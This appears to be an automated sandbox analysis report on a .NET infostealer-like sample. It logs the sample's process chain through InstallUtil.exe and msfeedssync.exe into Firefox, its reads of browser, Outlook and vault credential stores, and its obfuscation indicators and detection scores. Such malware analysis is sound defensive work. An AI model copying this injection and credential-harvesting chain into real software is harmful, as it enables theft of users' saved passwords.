Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02ABE6AC	9_2_02ABE6AC
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02ABD778	9_2_02ABD778
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02ABCA18	9_2_02ABCA18
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02ABC9EE	9_2_02ABC9EE

Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 02CF7E54 appears 101 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 02D1EA12 appears 86 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 02D2F290 appears 105 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 02CE5130 appears 58 times
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: String function: 02C9B970 appears 250 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 0110EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 010D5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 0111F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 010E7E54 appears 110 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 0108B970 appears 250 times

Source: 2Stejb80vJ.exe, 00000000.00000002.1266356154.00000000012FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe, 00000000.00000000.1256043614.0000000000D2F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCvoxsgsfodj.exe8 vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe, 00000000.00000002.1290052858.0000000006480000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004563000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe, 00000000.00000002.1285928493.00000000057C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameZnozcpry.dll" vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe, 00000000.00000002.1267757306.0000000003041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 2Stejb80vJ.exe
Source: 2Stejb80vJ.exe	Binary or memory string: OriginalFilenameCvoxsgsfodj.exe8 vs 2Stejb80vJ.exe

Source: 2Stejb80vJ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@22/10

Source: C:\Users\user\Desktop\2Stejb80vJ.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\msfeedssync.exe

File created: C:\Users\user\AppData\Local\Temp\1euF2H00K

Jump to behavior

Source: 2Stejb80vJ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2Stejb80vJ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\2Stejb80vJ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msfeedssync.exe, 00000009.00000003.1698926092.0000000002824000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000003.1698926092.00000000027F1000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000002.3724212347.00000000027F1000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000002.3724212347.0000000002824000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 2Stejb80vJ.exe	Virustotal: Detection: 48%
Source: 2Stejb80vJ.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\2Stejb80vJ.exe "C:\Users\user\Desktop\2Stejb80vJ.exe"
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Process created: C:\Windows\SysWOW64\msfeedssync.exe "C:\Windows\SysWOW64\msfeedssync.exe"
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Process created: C:\Windows\SysWOW64\msfeedssync.exe "C:\Windows\SysWOW64\msfeedssync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msfeedssync.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\fxrjKwUKrvQridGVYEaSFvBVHCNqlIcCsabusilbsfxzKtipCMOGFeQZroOuArTlbnbzVaQKI\UPM8KZRaz30lCAjNcEm6.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\2Stejb80vJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\2Stejb80vJ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\msfeedssync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 2Stejb80vJ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 2Stejb80vJ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 2Stejb80vJ.exe

Static file information: File size 2779136 > 1048576

Source: 2Stejb80vJ.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2a5e00

Source: 2Stejb80vJ.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msfeedssync.pdbUGP source: InstallUtil.exe, 00000002.00000002.1511482654.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000002.3724366403.000000000076E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 2Stejb80vJ.exe, 00000000.00000002.1290052858.0000000006480000.00000004.08000000.00040000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004563000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: InstallUtil.exe, 00000002.00000002.1512128441.0000000001060000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000002.3725902542.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000002.3725902542.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000003.1511427615.000000000291B000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000003.1513328412.0000000002AC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 2Stejb80vJ.exe, 00000000.00000002.1290052858.0000000006480000.00000004.08000000.00040000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004563000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: InstallUtil.exe, InstallUtil.exe, 00000002.00000002.1512128441.0000000001060000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, msfeedssync.exe, 00000009.00000002.3725902542.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000002.3725902542.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000003.1511427615.000000000291B000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000003.1513328412.0000000002AC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: msfeedssync.exe, 00000009.00000002.3724212347.0000000002772000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000002.3726343665.000000000329C000.00000004.10000000.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000000.1580741225.000000000340C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1804393597.000000003187C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: msfeedssync.pdb source: InstallUtil.exe, 00000002.00000002.1511482654.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000002.3724366403.000000000076E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: msfeedssync.exe, 00000009.00000002.3724212347.0000000002772000.00000004.00000020.00020000.00000000.sdmp, msfeedssync.exe, 00000009.00000002.3726343665.000000000329C000.00000004.10000000.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000000.1580741225.000000000340C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1804393597.000000003187C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UPM8KZRaz30lCAjNcEm6.exe, 00000008.00000002.3725289857.0000000000F7F000.00000002.00000001.01000000.00000007.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000000.1579858391.0000000000F7F000.00000002.00000001.01000000.00000007.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 2Stejb80vJ.exe, ElementProgram.cs	.Net Code: ModifyAutomatableElement System.AppDomain.Load(byte[])
Source: 0.2.2Stejb80vJ.exe.40bd5b0.6.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.2Stejb80vJ.exe.40bd5b0.6.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.2Stejb80vJ.exe.40bd5b0.6.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.2Stejb80vJ.exe.40bd5b0.6.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.2Stejb80vJ.exe.40bd5b0.6.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.2Stejb80vJ.exe.406d590.3.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.2Stejb80vJ.exe.406d590.3.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.2Stejb80vJ.exe.406d590.3.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.2Stejb80vJ.exe.406d590.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.2Stejb80vJ.exe.406d590.3.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.2Stejb80vJ.exe.46c16ce.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Stejb80vJ.exe.5d10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Stejb80vJ.exe.47c0ec0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Stejb80vJ.exe.5d10000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Stejb80vJ.exe.46c16ce.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Stejb80vJ.exe.4658df0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Stejb80vJ.exe.4630dd0.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Stejb80vJ.exe.47c0ec0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1267757306.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1288833714.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1280336868.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1280336868.0000000004563000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2Stejb80vJ.exe PID: 6872, type: MEMORYSTR

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_06464C69 push es; iretd	0_2_06464C70
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_06464C15 push es; ret	0_2_06464C68
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_06461889 push es; ret	0_2_064618A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004170F5 push ebp; ret	2_2_004171B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004170B6 push ecx; iretd	2_2_004170B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00417152 push ebp; ret	2_2_004171B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_004032A0 push eax; ret	2_2_004032A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00414B89 push ebx; iretd	2_2_00414B8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00401450 push esi; retf 89E0h	2_2_00401545
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00418C2D push ss; retf	2_2_00418CBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0040BD8D push eax; retf	2_2_0040BD8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00417E53 push es; ret	2_2_00417E82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00417ED2 push esi; iretd	2_2_00417EDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00415FE3 push esi; retf	2_2_00415FEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0106225F pushad ; ret	2_2_010627F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010627FA pushad ; ret	2_2_010627F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010909AD push ecx; mov dword ptr [esp], ecx	2_2_010909B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0106283D push eax; iretd	2_2_01062858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_01061368 push eax; iretd	2_2_01061369
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CA09AD push ecx; mov dword ptr [esp], ecx	9_2_02CA09B6
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02478AEA push eax; retf	9_2_02478AEB
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02484BB0 push es; ret	9_2_02484BDF
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0249080D push edi; ret	9_2_0249080E
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02484C2F push esi; iretd	9_2_02484C37
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02482D40 push esi; retf	9_2_02482D4B
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_0248DADD push ecx; retf	9_2_0248DADE
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_024818E6 push ebx; iretd	9_2_024818E7
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02483E52 push ebp; ret	9_2_02483F0E
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02483E13 push ecx; iretd	9_2_02483E14
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02483EAF push ebp; ret	9_2_02483F0E
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02AB4669 push ebx; retf	9_2_02AB466A

Source: 0.2.2Stejb80vJ.exe.57c0000.10.raw.unpack, oy1EET92y3t9NHaTcFf.cs

High entropy of concatenated method names: 'jMn9UASrIW', 'keT98Q8phc', 'LC09gmLcAD', 'r9U9XgwePS', 'ckO9SoBZJY', 'mNp9GymHkU', 't1l93BGBkQ', 'Xn49Q81fhT', 'axj9e3hDX9', 'C3K9Fw3ZxG'

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
